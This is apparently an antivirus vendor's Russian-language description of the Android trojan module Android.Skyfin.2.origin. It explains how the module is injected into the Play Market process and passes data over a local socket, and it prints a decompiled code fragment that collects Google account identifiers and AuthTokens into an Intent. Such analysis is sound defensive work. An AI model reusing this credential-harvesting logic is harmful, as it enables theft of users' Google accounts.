SHA1:
- d73bbca5da162ec8f95e85ce884b899a46f14e46
Вредоносный программный модуль, который является компонентом троянца Android.Skyfin.1.origin. Он представляет собой исполняемый dex-файл виртуальной машины Dalvik. Android.Skyfin.1.origin внедряет этот модуль в активный процесс com.android.vending программы Play Маркет.
Android.Skyfin.2.origin создает локальный сокет и ожидает подключения к нему Android.Skyfin.1.origin. При подключении троянца модуль Android.Skyfin.2.origin отправляет в ответ параметр OK\n, после чего крадет и передает Android.Skyfin.1.origin следующие данные:
Intent intent0 = new Intent("com.android.play.info");
intent0.putExtra("tocCookie", ((String)object3)); // уникальный идентификатор, который формируется после принятия лицензионного соглашения в приложении Play Маркет;
intent0.putExtra("loggingId", ((String)object0)); // уникальный идентификатор пользователя в сервисах Google;
intent0.putExtra("androidId", string0); // уникальный идентификатор устройства в сервисах Google;
intent0.putExtra("androidmarket", string1); // AuthToken;
intent0.putExtra("androidsecure", string2); // AuthToken;
intent0.putExtra("ac2dm", string3); // AuthToken для устаревшей версии Google Cloud;
intent0.putExtra("account_name", account0.name);
intent0.putExtra("account_type", account0.type);